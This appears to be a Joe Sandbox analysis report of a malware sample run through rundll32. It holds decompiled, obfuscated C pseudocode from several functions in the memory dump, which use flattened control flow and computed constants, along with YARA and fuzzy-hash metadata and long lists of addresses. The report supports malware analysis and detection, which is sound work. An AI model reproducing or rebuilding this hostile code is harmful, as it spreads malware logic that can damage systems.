                                                                                                                      0x00690888
                                                                                                                      0x0069088e
                                                                                                                      0x00000000
                                                                                                                      0x00690894
                                                                                                                      0x006908ae
                                                                                                                      0x006908b3
                                                                                                                      0x0069088e
                                                                                                                      0x00690882
                                                                                                                      0x0069087e
                                                                                                                      0x00690872
                                                                                                                      0x00690a04
                                                                                                                      0x00690a0d
                                                                                                                      0x006909cb
                                                                                                                      0x006909cb
                                                                                                                      0x006909cb
                                                                                                                      0x00000000
                                                                                                                      0x006909d7
                                                                                                                      0x0069085f

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ,
                                                                                                                      • API String ID: 0-2314114710
                                                                                                                      • Opcode ID: 30116ee710ef0730fea70be9125fcb8f9b2c2f4987f2ab418fe1ed3e53fc5c91
                                                                                                                      • Instruction ID: 32aa6a95589a482d0517ed687610c1c550f734fb56b59a7078b8214f4d041c61
                                                                                                                      • Opcode Fuzzy Hash: 30116ee710ef0730fea70be9125fcb8f9b2c2f4987f2ab418fe1ed3e53fc5c91
                                                                                                                      • Instruction Fuzzy Hash: 97E130716083809FD7A8CF25D58A90BFBF2BBC5718F60891DF59A86260C7B1D949CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100134F0 Relevance: 1.5, APIs: 1, Instructions: 11windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Iconic
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 110040809-0
                                                                                                                      • Opcode ID: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                      • Instruction ID: 838b9ee9edc54b62b4d2e1430c30368496747ad900502173d0e488298d75c8b4
                                                                                                                      • Opcode Fuzzy Hash: c62964fb237a153d00a9d951690d2dc04f1de6fa771c83c35e5bfac844c94462
                                                                                                                      • Instruction Fuzzy Hash: D6C012B0504208EB8704CB94D940C1977A8E74D30470002CCF80C83300D531AD008655
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00699EEC Relevance: 1.5, Strings: 1, Instructions: 226COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 98%
                                                                                                                      			E00699EEC() {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _t207;
				intOrPtr _t209;
				intOrPtr _t212;
				intOrPtr _t214;
				intOrPtr _t218;
				void* _t219;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t257;
				void* _t259;
				char _t263;
				void* _t264;
				void* _t266;

				_v64 = 0xd7ee0e;
				_t257 = 0x22;
				_v64 = _v64 / _t257;
				_v64 = _v64 + 0x89a9;
				_t219 = 0;
				_v64 = _v64 ^ 0x0000b335;
				_t259 = 0xb83ebc6;
				_v96 = 0xf5dfb6;
				_v96 = _v96 >> 6;
				_t221 = 0x26;
				_v96 = _v96 / _t221;
				_t222 = 0x2d;
				_v96 = _v96 * 0x58;
				_v96 = _v96 ^ 0x000b9251;
				_v60 = 0xd70e95;
				_v60 = _v60 >> 9;
				_v60 = _v60 + 0xffffe8b9;
				_v60 = _v60 ^ 0x00062b78;
				_v44 = 0xb641ac;
				_v44 = _v44 / _t222;
				_v44 = _v44 ^ 0x0002d028;
				_v52 = 0xbf8457;
				_t223 = 0x5d;
				_v52 = _v52 / _t223;
				_v52 = _v52 | 0xbb7661a2;
				_v52 = _v52 ^ 0xbb710206;
				_v80 = 0x47b11a;
				_v80 = _v80 ^ 0xc2c4229c;
				_t224 = 0x18;
				_v80 = _v80 / _t224;
				_v80 = _v80 + 0xffff1c96;
				_v80 = _v80 ^ 0x08184a4c;
				_v36 = 0x40dca8;
				_v36 = _v36 + 0x3144;
				_v36 = _v36 ^ 0x004d2780;
				_v40 = 0xec5297;
				_v40 = _v40 * 0x45;
				_v40 = _v40 ^ 0x3fbac2f2;
				_v72 = 0x18b121;
				_v72 = _v72 >> 1;
				_v72 = _v72 * 0x1e;
				_v72 = _v72 + 0xfd79;
				_v72 = _v72 ^ 0x0173ec5f;
				_v76 = 0xd8cc67;
				_v76 = _v76 >> 2;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 * 0x23;
				_v76 = _v76 ^ 0x000d42f3;
				_v88 = 0x5f1bd9;
				_v88 = _v88 + 0x89b3;
				_v88 = _v88 ^ 0xee5f73f3;
				_v88 = _v88 ^ 0xfa82a5ad;
				_v88 = _v88 ^ 0x14801a76;
				_v92 = 0x778c42;
				_t225 = 0x6d;
				_v92 = _v92 * 0x69;
				_v92 = _v92 << 0xb;
				_v92 = _v92 | 0xba472be1;
				_v92 = _v92 ^ 0xfe7d7315;
				_v56 = 0x5dd318;
				_v56 = _v56 / _t257;
				_v56 = _v56 << 0xc;
				_v56 = _v56 ^ 0x2c2721c6;
				_v84 = 0xd870dc;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 | 0x1345b487;
				_v84 = _v84 * 0x5a;
				_v84 = _v84 ^ 0xc68bf031;
				_v48 = 0x9a419e;
				_v48 = _v48 | 0xfa3afde2;
				_v48 = _v48 ^ 0xfabdbed6;
				_v32 = 0x7a1ab;
				_v32 = _v32 / _t225;
				_v32 = _v32 ^ 0x000f5e95;
				_v68 = 0x67bbab;
				_v68 = _v68 + 0xffffccf8;
				_v68 = _v68 ^ 0x5c1ded32;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x4cb92f41;
				_t263 = _v28;
				_t258 = _v28;
				goto L1;
				do {
					while(1) {
						L1:
						_t266 = _t259 - 0xc23b37f;
						if(_t266 > 0) {
							break;
						}
						if(_t266 == 0) {
							E00698519(_v56, _v84, _v24);
							_t259 = 0xdb1153f;
							continue;
						}
						if(_t259 == 0xab8c2) {
							_t209 =  *0x6a3e10; // 0x0
							E00688ECE(_v8 + 1, _t209 + 0x1c, _v12, _v92);
							_t212 =  *0x6a3e10; // 0x0
							_t234 = _v16;
							_t264 = _t264 + 0xc;
							_t219 = 1;
							_t259 = 0xc23b37f;
							 *((intOrPtr*)(_t212 + 0xc)) = _v16;
							continue;
						}
						if(_t259 == 0x26dca52) {
							_t234 = _v96;
							_t214 = E0068A9CE(_v96, _t263,  &_v28, _v60, _v44);
							_t258 = _t214;
							_t264 = _t264 + 0xc;
							if(_t214 == 0) {
								goto L22;
							}
							_t259 = 0xe747a68;
							continue;
						}
						if(_t259 == 0xa9b692f) {
							_t263 = E0068F899(_t234);
							_t259 = 0x26dca52;
							continue;
						}
						if(_t259 != 0xb83ebc6) {
							goto L21;
						} else {
							_t259 = 0xa9b692f;
							continue;
						}
					}
					if(_t259 == 0xdb1153f) {
						E00684E7D(_v48, _v32, _t258, _v68);
						_t259 = 0xdb3b1d3;
						goto L21;
					}
					if(_t259 == 0xe566670) {
						_t207 = E0069894B( &_v16,  &_v24, _v36, _v40, _v72, _v76);
						_t264 = _t264 + 0x10;
						asm("sbb esi, esi");
						_t259 = ( ~_t207 & 0xf3e70543) + 0xc23b37f;
						goto L1;
					}
					if(_t259 != 0xe747a68) {
						goto L21;
					}
					_t259 = 0xdb1153f;
					if(_v28 > 2) {
						_t218 = E00684346( &_v20, _v52,  *((intOrPtr*)(_t258 + 8)), _v80);
						_v24 = _t218;
						_pop(_t234);
						if(_t218 != 0) {
							_t259 = 0xe566670;
						}
					}
					goto L1;
					L21:
				} while (_t259 != 0xdb3b1d3);
				L22:
				return _t219;
			}










































                                                                                                                      0x00699eef
                                                                                                                      0x00699f03
                                                                                                                      0x00699f08
                                                                                                                      0x00699f0e
                                                                                                                      0x00699f16
                                                                                                                      0x00699f18
                                                                                                                      0x00699f20
                                                                                                                      0x00699f25
                                                                                                                      0x00699f2d
                                                                                                                      0x00699f36
                                                                                                                      0x00699f3b
                                                                                                                      0x00699f46
                                                                                                                      0x00699f49
                                                                                                                      0x00699f4d
                                                                                                                      0x00699f55
                                                                                                                      0x00699f5d
                                                                                                                      0x00699f62
                                                                                                                      0x00699f6a
                                                                                                                      0x00699f72
                                                                                                                      0x00699f82
                                                                                                                      0x00699f86
                                                                                                                      0x00699f8e
                                                                                                                      0x00699f9a
                                                                                                                      0x00699f9f
                                                                                                                      0x00699fa5
                                                                                                                      0x00699fad
                                                                                                                      0x00699fb5
                                                                                                                      0x00699fbd
                                                                                                                      0x00699fc9
                                                                                                                      0x00699fcc
                                                                                                                      0x00699fd0
                                                                                                                      0x00699fd8
                                                                                                                      0x00699fe0
                                                                                                                      0x00699fe8
                                                                                                                      0x00699ff0
                                                                                                                      0x00699ff8
                                                                                                                      0x0069a005
                                                                                                                      0x0069a009
                                                                                                                      0x0069a011
                                                                                                                      0x0069a019
                                                                                                                      0x0069a022
                                                                                                                      0x0069a026
                                                                                                                      0x0069a02e
                                                                                                                      0x0069a036
                                                                                                                      0x0069a03e
                                                                                                                      0x0069a043
                                                                                                                      0x0069a04d
                                                                                                                      0x0069a051
                                                                                                                      0x0069a059
                                                                                                                      0x0069a061
                                                                                                                      0x0069a069
                                                                                                                      0x0069a071
                                                                                                                      0x0069a079
                                                                                                                      0x0069a081
                                                                                                                      0x0069a092
                                                                                                                      0x0069a093
                                                                                                                      0x0069a097
                                                                                                                      0x0069a09c
                                                                                                                      0x0069a0a4
                                                                                                                      0x0069a0ac
                                                                                                                      0x0069a0bc
                                                                                                                      0x0069a0c0
                                                                                                                      0x0069a0c5
                                                                                                                      0x0069a0cd
                                                                                                                      0x0069a0d5
                                                                                                                      0x0069a0da
                                                                                                                      0x0069a0e7
                                                                                                                      0x0069a0eb
                                                                                                                      0x0069a0f3
                                                                                                                      0x0069a0fb
                                                                                                                      0x0069a103
                                                                                                                      0x0069a10b
                                                                                                                      0x0069a119
                                                                                                                      0x0069a11d
                                                                                                                      0x0069a125
                                                                                                                      0x0069a12d
                                                                                                                      0x0069a135
                                                                                                                      0x0069a13d
                                                                                                                      0x0069a142
                                                                                                                      0x0069a14a
                                                                                                                      0x0069a14e
                                                                                                                      0x0069a14e
                                                                                                                      0x0069a152
                                                                                                                      0x0069a152
                                                                                                                      0x0069a152
                                                                                                                      0x0069a152
                                                                                                                      0x0069a158
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069a15e
                                                                                                                      0x0069a216
                                                                                                                      0x0069a21c
                                                                                                                      0x00000000
                                                                                                                      0x0069a21c
                                                                                                                      0x0069a16a
                                                                                                                      0x0069a1d5
                                                                                                                      0x0069a1e9
                                                                                                                      0x0069a1ee
                                                                                                                      0x0069a1f5
                                                                                                                      0x0069a1f9
                                                                                                                      0x0069a1fc
                                                                                                                      0x0069a1fd
                                                                                                                      0x0069a202
                                                                                                                      0x00000000
                                                                                                                      0x0069a202
                                                                                                                      0x0069a172
                                                                                                                      0x0069a1af
                                                                                                                      0x0069a1b4
                                                                                                                      0x0069a1b9
                                                                                                                      0x0069a1bb
                                                                                                                      0x0069a1c0
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069a1c6
                                                                                                                      0x00000000
                                                                                                                      0x0069a1c6
                                                                                                                      0x0069a17a
                                                                                                                      0x0069a198
                                                                                                                      0x0069a19a
                                                                                                                      0x00000000
                                                                                                                      0x0069a19a
                                                                                                                      0x0069a182
                                                                                                                      0x00000000
                                                                                                                      0x0069a188
                                                                                                                      0x0069a188
                                                                                                                      0x00000000
                                                                                                                      0x0069a188
                                                                                                                      0x0069a182
                                                                                                                      0x0069a22c
                                                                                                                      0x0069a2c6
                                                                                                                      0x0069a2cd
                                                                                                                      0x00000000
                                                                                                                      0x0069a2cd
                                                                                                                      0x0069a238
                                                                                                                      0x0069a29a
                                                                                                                      0x0069a29f
                                                                                                                      0x0069a2a6
                                                                                                                      0x0069a2ae
                                                                                                                      0x00000000
                                                                                                                      0x0069a2ae
                                                                                                                      0x0069a240
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069a24b
                                                                                                                      0x0069a250
                                                                                                                      0x0069a265
                                                                                                                      0x0069a26a
                                                                                                                      0x0069a26f
                                                                                                                      0x0069a272
                                                                                                                      0x0069a278
                                                                                                                      0x0069a278
                                                                                                                      0x0069a272
                                                                                                                      0x00000000
                                                                                                                      0x0069a2d2
                                                                                                                      0x0069a2d2
                                                                                                                      0x0069a2e1
                                                                                                                      0x0069a2e7

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: D1
                                                                                                                      • API String ID: 0-2215811268
                                                                                                                      • Opcode ID: cb62473963271c49ca35199f4abbf7e79df6bb88e7d45ac679e158a895a028de
                                                                                                                      • Instruction ID: 4035a77a3dea0f3b48a3218ef1c40607c98c82d3f079b35ea775a6e798e7d93b
                                                                                                                      • Opcode Fuzzy Hash: cb62473963271c49ca35199f4abbf7e79df6bb88e7d45ac679e158a895a028de
                                                                                                                      • Instruction Fuzzy Hash: 21A162729083008FC758CF65C48940BFBE2BBC4358F148A2EF5A997220D7B5CA498F87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069BB23 Relevance: 1.4, Strings: 1, Instructions: 173COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 86%
                                                                                                                      			E0069BB23(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t138;
				intOrPtr _t161;
				void* _t162;
				void* _t164;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				void* _t185;
				signed int* _t189;

				_t162 = __ecx;
				_push(1);
				_push(1);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t138);
				_v16 = 0xdfc885;
				_t189 =  &(( &_v76)[8]);
				asm("stosd");
				_t185 = 0;
				_t164 = 0xcc97672;
				asm("stosd");
				asm("stosd");
				_v32 = 0x60c2fa;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x00046f58;
				_v76 = 0xb548f0;
				_v76 = _v76 >> 0xc;
				_t181 = 0xc;
				_v76 = _v76 * 0x3c;
				_v76 = _v76 + 0xffff64d0;
				_v76 = _v76 ^ 0x0001fd54;
				_v52 = 0x15927a;
				_v52 = _v52 / _t181;
				_v52 = _v52 ^ 0x000151ae;
				_v56 = 0xd6ed9;
				_t182 = 0x1a;
				_v56 = _v56 * 0x3f;
				_v56 = _v56 + 0xfffffbb4;
				_v56 = _v56 ^ 0x0345d46e;
				_v64 = 0xba2b53;
				_v64 = _v64 * 0x6d;
				_v64 = _v64 ^ 0x73d6d9cf;
				_v64 = _v64 * 0x31;
				_v64 = _v64 ^ 0x981330b4;
				_v60 = 0x269f8;
				_v60 = _v60 >> 5;
				_v60 = _v60 + 0xffffb859;
				_v60 = _v60 ^ 0xfff00afd;
				_v68 = 0xfd9147;
				_v68 = _v68 ^ 0x8de1643f;
				_v68 = _v68 / _t182;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000df039;
				_v72 = 0x5def36;
				_v72 = _v72 | 0xd620e1c7;
				_v72 = _v72 + 0xd307;
				_t183 = 0x48;
				_v72 = _v72 / _t183;
				_v72 = _v72 ^ 0x02f0e4dc;
				_v24 = 0xf7704c;
				_v24 = _v24 + 0x27dd;
				_v24 = _v24 ^ 0x00ff74b2;
				_v28 = 0x151ed9;
				_v28 = _v28 * 0x48;
				_v28 = _v28 ^ 0x05f046e2;
				_v36 = 0xddc4df;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 | 0x7f83127d;
				_v36 = _v36 ^ 0x7f8e5ab1;
				_v40 = 0x29fd7f;
				_v40 = _v40 >> 7;
				_v40 = _v40 | 0x8d3b2756;
				_v40 = _v40 ^ 0x8d37b79a;
				_v44 = 0x8dc5a8;
				_v44 = _v44 * 0x63;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x036b3557;
				_v48 = 0xd61f7e;
				_v48 = _v48 | 0xd43d52c3;
				_v48 = _v48 + 0xa376;
				_v48 = _v48 ^ 0xd504b7b0;
				_t184 = _v20;
				while(_t164 != 0x2524be6) {
					if(_t164 == 0xcc97672) {
						_t164 = 0xe41debb;
						continue;
					} else {
						if(_t164 == 0xdd773d9) {
							if(E0069D8EC(_v52, _v56,  &_v20, _t184) != 0) {
								_t164 = 0xe01b1ec;
								continue;
							}
						} else {
							if(_t164 == 0xe01b1ec) {
								E006A0AC8(_v64, _v60, 1, _v68, _v20, _v72, _a12, _t162, _v24, 1, _t164, _v28);
								_t189 =  &(_t189[0xa]);
								_t164 = 0x2524be6;
								_t185 =  !=  ? 1 : _t185;
								continue;
							} else {
								if(_t164 != 0xe41debb) {
									L13:
									if(_t164 != 0x78a313b) {
										continue;
									}
								} else {
									_t161 = E00683DE2(_t164);
									_t184 = _t161;
									if(_t161 != 0xffffffff) {
										_t164 = 0xdd773d9;
										continue;
									}
								}
							}
						}
					}
					return _t185;
				}
				E00691E67(_v36, _v40, _v44, _v48, _v20);
				_t189 =  &(_t189[3]);
				_t164 = 0x78a313b;
				goto L13;
			}





























                                                                                                                      0x0069bb2c
                                                                                                                      0x0069bb2f
                                                                                                                      0x0069bb30
                                                                                                                      0x0069bb31
                                                                                                                      0x0069bb35
                                                                                                                      0x0069bb39
                                                                                                                      0x0069bb3d
                                                                                                                      0x0069bb41
                                                                                                                      0x0069bb42
                                                                                                                      0x0069bb43
                                                                                                                      0x0069bb48
                                                                                                                      0x0069bb56
                                                                                                                      0x0069bb59
                                                                                                                      0x0069bb5c
                                                                                                                      0x0069bb5e
                                                                                                                      0x0069bb65
                                                                                                                      0x0069bb66
                                                                                                                      0x0069bb67
                                                                                                                      0x0069bb6f
                                                                                                                      0x0069bb74
                                                                                                                      0x0069bb7c
                                                                                                                      0x0069bb84
                                                                                                                      0x0069bb8e
                                                                                                                      0x0069bb91
                                                                                                                      0x0069bb95
                                                                                                                      0x0069bb9d
                                                                                                                      0x0069bba5
                                                                                                                      0x0069bbbd
                                                                                                                      0x0069bbc1
                                                                                                                      0x0069bbc9
                                                                                                                      0x0069bbd6
                                                                                                                      0x0069bbd9
                                                                                                                      0x0069bbdd
                                                                                                                      0x0069bbe5
                                                                                                                      0x0069bbed
                                                                                                                      0x0069bbfa
                                                                                                                      0x0069bbfe
                                                                                                                      0x0069bc0b
                                                                                                                      0x0069bc0f
                                                                                                                      0x0069bc17
                                                                                                                      0x0069bc1f
                                                                                                                      0x0069bc24
                                                                                                                      0x0069bc2c
                                                                                                                      0x0069bc34
                                                                                                                      0x0069bc3c
                                                                                                                      0x0069bc4c
                                                                                                                      0x0069bc50
                                                                                                                      0x0069bc55
                                                                                                                      0x0069bc5d
                                                                                                                      0x0069bc65
                                                                                                                      0x0069bc6d
                                                                                                                      0x0069bc79
                                                                                                                      0x0069bc7c
                                                                                                                      0x0069bc80
                                                                                                                      0x0069bc88
                                                                                                                      0x0069bc90
                                                                                                                      0x0069bc98
                                                                                                                      0x0069bca0
                                                                                                                      0x0069bcad
                                                                                                                      0x0069bcb1
                                                                                                                      0x0069bcb9
                                                                                                                      0x0069bcc1
                                                                                                                      0x0069bcc6
                                                                                                                      0x0069bcce
                                                                                                                      0x0069bcd6
                                                                                                                      0x0069bcde
                                                                                                                      0x0069bce3
                                                                                                                      0x0069bceb
                                                                                                                      0x0069bcf3
                                                                                                                      0x0069bd00
                                                                                                                      0x0069bd04
                                                                                                                      0x0069bd09
                                                                                                                      0x0069bd11
                                                                                                                      0x0069bd19
                                                                                                                      0x0069bd21
                                                                                                                      0x0069bd29
                                                                                                                      0x0069bd31
                                                                                                                      0x0069bd35
                                                                                                                      0x0069bd47
                                                                                                                      0x0069bde6
                                                                                                                      0x00000000
                                                                                                                      0x0069bd4d
                                                                                                                      0x0069bd53
                                                                                                                      0x0069bdda
                                                                                                                      0x0069bddc
                                                                                                                      0x00000000
                                                                                                                      0x0069bddc
                                                                                                                      0x0069bd55
                                                                                                                      0x0069bd5b
                                                                                                                      0x0069bdac
                                                                                                                      0x0069bdb1
                                                                                                                      0x0069bdb4
                                                                                                                      0x0069bdbb
                                                                                                                      0x00000000
                                                                                                                      0x0069bd5d
                                                                                                                      0x0069bd63
                                                                                                                      0x0069be11
                                                                                                                      0x0069be17
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069bd69
                                                                                                                      0x0069bd71
                                                                                                                      0x0069bd76
                                                                                                                      0x0069bd7b
                                                                                                                      0x0069bd81
                                                                                                                      0x00000000
                                                                                                                      0x0069bd81
                                                                                                                      0x0069bd7b
                                                                                                                      0x0069bd63
                                                                                                                      0x0069bd5b
                                                                                                                      0x0069bd53
                                                                                                                      0x0069be26
                                                                                                                      0x0069be26
                                                                                                                      0x0069be04
                                                                                                                      0x0069be09
                                                                                                                      0x0069be0c
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6]
                                                                                                                      • API String ID: 0-3974934468
                                                                                                                      • Opcode ID: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                      • Instruction ID: 7b5e456703eb4397fd30d408aad475fc737a97c51f1131c123a5dd081e297b9f
                                                                                                                      • Opcode Fuzzy Hash: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
                                                                                                                      • Instruction Fuzzy Hash: D9714071108341AFC758CF25C98941BBBEAFFC9758F505A1DF6969A260C372CA098F47
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00685361 Relevance: 1.4, Strings: 1, Instructions: 124COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E00685361(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				unsigned int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				void* __edx;
				void* _t84;
				void* _t104;
				void* _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				void* _t124;
				signed int* _t127;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E006920B9(_t84);
				_v4 = 0x18047d;
				_t127 =  &(( &_v32)[5]);
				_v4 = _v4 >> 0xa;
				_v4 = _v4 ^ 0x000d3248;
				_t124 = 0;
				_v28 = 0x90acd4;
				_t104 = 0x35df4ed;
				_v28 = _v28 >> 5;
				_v28 = _v28 + 0xffff3107;
				_v28 = _v28 | 0xd0f9b279;
				_v28 = _v28 ^ 0xd0f1daef;
				_v8 = 0x9d14b7;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x027823b1;
				_v32 = 0xfd6947;
				_v32 = _v32 + 0xffff03bf;
				_t120 = 0x72;
				_v32 = _v32 / _t120;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00066e44;
				_v16 = 0x111da;
				_v16 = _v16 ^ 0xdd7c73d4;
				_v16 = _v16 | 0x7d37165e;
				_v16 = _v16 ^ 0xfd769a76;
				_v12 = 0x2531de;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0xa63e9142;
				_v20 = 0x6e0002;
				_v20 = _v20 >> 0xe;
				_t121 = 0xe;
				_v20 = _v20 / _t121;
				_t122 = 0x3d;
				_v20 = _v20 * 0x64;
				_v20 = _v20 ^ 0x000bef19;
				_v24 = 0xa3fc95;
				_v24 = _v24 + 0xdcd1;
				_v24 = _v24 << 3;
				_v24 = _v24 / _t122;
				_v24 = _v24 ^ 0x0013a2ec;
				while(_t104 != 0x311781) {
					if(_t104 == 0x35df4ed) {
						_push(_t104);
						_push(_t104);
						_t118 = 0x28;
						 *0x6a3e08 = E00687FF2(_t118);
						_t104 = 0x605992c;
						continue;
					} else {
						if(_t104 == 0x477ef52) {
							E0068924B();
							_t104 = 0x311781;
							continue;
						} else {
							if(_t104 == 0x605992c) {
								if(E006A0F33() != 0) {
									_t104 = 0xdb1ba22;
									continue;
								}
							} else {
								if(_t104 != 0xdb1ba22) {
									L13:
									if(_t104 != 0x5723dc8) {
										continue;
									}
								} else {
									_t124 = E0068960D(_v16, _a12, _a8, _v12);
									_t127 =  &(_t127[3]);
									if(_t124 == 0) {
										_t104 = 0x477ef52;
										continue;
									}
								}
							}
						}
					}
					return _t124;
				}
				E00698519(_v20, _v24,  *0x6a3e08);
				_t104 = 0x5723dc8;
				goto L13;
			}




















                                                                                                                      0x00685368
                                                                                                                      0x0068536c
                                                                                                                      0x00685370
                                                                                                                      0x00685376
                                                                                                                      0x0068537b
                                                                                                                      0x00685383
                                                                                                                      0x00685386
                                                                                                                      0x0068538d
                                                                                                                      0x00685395
                                                                                                                      0x00685397
                                                                                                                      0x0068539f
                                                                                                                      0x006853a4
                                                                                                                      0x006853ae
                                                                                                                      0x006853bb
                                                                                                                      0x006853c3
                                                                                                                      0x006853cb
                                                                                                                      0x006853d3
                                                                                                                      0x006853d8
                                                                                                                      0x006853e0
                                                                                                                      0x006853e8
                                                                                                                      0x006853f6
                                                                                                                      0x006853fb
                                                                                                                      0x00685401
                                                                                                                      0x00685406
                                                                                                                      0x0068540e
                                                                                                                      0x00685416
                                                                                                                      0x0068541e
                                                                                                                      0x00685426
                                                                                                                      0x0068542e
                                                                                                                      0x00685436
                                                                                                                      0x0068543b
                                                                                                                      0x00685443
                                                                                                                      0x0068544b
                                                                                                                      0x00685454
                                                                                                                      0x00685459
                                                                                                                      0x00685464
                                                                                                                      0x00685465
                                                                                                                      0x00685469
                                                                                                                      0x00685471
                                                                                                                      0x00685479
                                                                                                                      0x00685481
                                                                                                                      0x00685491
                                                                                                                      0x00685495
                                                                                                                      0x0068549d
                                                                                                                      0x006854a7
                                                                                                                      0x00685501
                                                                                                                      0x00685502
                                                                                                                      0x00685505
                                                                                                                      0x0068550d
                                                                                                                      0x00685512
                                                                                                                      0x00000000
                                                                                                                      0x006854a9
                                                                                                                      0x006854ab
                                                                                                                      0x006854ec
                                                                                                                      0x006854f1
                                                                                                                      0x00000000
                                                                                                                      0x006854ad
                                                                                                                      0x006854b3
                                                                                                                      0x006854e6
                                                                                                                      0x006854e8
                                                                                                                      0x00000000
                                                                                                                      0x006854e8
                                                                                                                      0x006854b5
                                                                                                                      0x006854b7
                                                                                                                      0x00685532
                                                                                                                      0x00685538
                                                                                                                      0x00000000
                                                                                                                      0x00000000
